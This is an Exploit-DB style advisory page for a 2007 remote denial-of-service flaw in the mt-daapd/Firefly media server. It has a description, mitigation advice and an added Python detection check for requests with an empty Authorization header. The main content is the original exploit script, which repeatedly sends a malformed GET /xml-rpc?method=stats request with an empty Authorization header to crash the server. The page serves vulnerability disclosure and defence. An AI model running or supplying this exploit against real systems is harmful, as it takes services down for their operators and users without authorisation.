Vendor: mt-dappd/Firefly media server
By: nnp
CVSS: 5.5 (MEDIUM)
CWE: Denial of Service
Product Name: mt-dappd/Firefly media server
Patch Exists: NO
Year: 2007

mt-dappd/Firefly media server remote DoS

This exploit lets a remote attacker crash the mt-dappd/Firefly media server. The attacker sends a specially crafted HTTP GET request, in the code below a request for /xml-rpc?method=stats with an Authorization header that has no value, and the server crashes and becomes unresponsive. The vulnerability was discovered by nnp and reported on unprotectedhex.com.

Mitigation:

The exploit code does not mention a specific mitigation. To protect against this vulnerability, users are advised to keep their mt-dappd/Firefly media server up to date with the latest patches and security updates. Configuring proper access controls and firewall rules also helps prevent unauthorized access to the server.
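
One way to apply such a rule in front of the server, as an added Python 3 example that is not part of the original advisory or exploit: a check a filtering proxy or log pipeline could use to flag requests whose Authorization header is present but has no value, as in the request the exploit on this page sends. The function names, the host `media.example` and the sample requests are constructed for illustration.

```python
import re

# Constructed samples. POC_SHAPED copies the request from the exploit on this page.
POC_SHAPED = b"GET /xml-rpc?method=stats HTTP/1.1\r\n \nAuthorization:\r\n\r\n"
NORMAL = (b"GET /xml-rpc?method=stats HTTP/1.1\r\nHost: media.example\r\n"
          b"Authorization: Basic dXNlcjpwYXNz\r\n\r\n")
NO_AUTH = b"GET /index.html HTTP/1.1\r\nHost: media.example\r\n\r\n"


def parse_head(raw: bytes):
    """Return (method, target, headers) for a raw HTTP request head.

    Accepts CRLF or bare LF line endings, because the exploit's request mixes them.
    headers is a list of (lowercased name, stripped value) pairs.
    """
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(rb"\r?\n", head)
    method, target = (lines[0].split() + [b"", b""])[:2]
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue  # whitespace-only line, present in the exploit's request
        if line[:1] in (b" ", b"\t") and headers:
            # Folded continuation line: it belongs to the previous header.
            name, value = headers[-1]
            headers[-1] = (name, (value + b" " + line.strip()).strip())
            continue
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return method, target, headers


def has_empty_authorization(raw: bytes) -> bool:
    """True when an Authorization header is present but carries no value."""
    _, _, headers = parse_head(raw)
    return any(name == b"authorization" and not value for name, value in headers)


if __name__ == "__main__":
    for label, req in (("poc-shaped", POC_SHAPED), ("normal", NORMAL), ("no-auth", NO_AUTH)):
        verdict = "reject" if has_empty_authorization(req) else "pass"
        print(label, parse_head(req)[1].decode(), verdict)
```

A request with no Authorization header at all is passed through, so the check does not interfere with unauthenticated pages.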

Exploit-DB raw data:

#!C:\python25\python25.exe

"""
Advisory : [UPH-07-02]
mt-dappd/Firefly media server remote DoS
Discovered by nnp
http://www.unprotectedhex.com
"""

import sys
import socket
import time

if len(sys.argv) != 3:
    sys.exit(-1)

kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n 
Authorization:\r\n\r\n"""

host = sys.argv[1]
port = sys.argv[2]

print '[+] Host : ' + host
print '[+] Port : ' + port

print "[+] Sending "
print kill_msg

ctr = 1
while 1:
    print '[+] Ctr : ' + str(ctr)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))
    s.send(kill_msg)
    s.close()
    ctr += 1

# milw0rm.com [2007-11-02]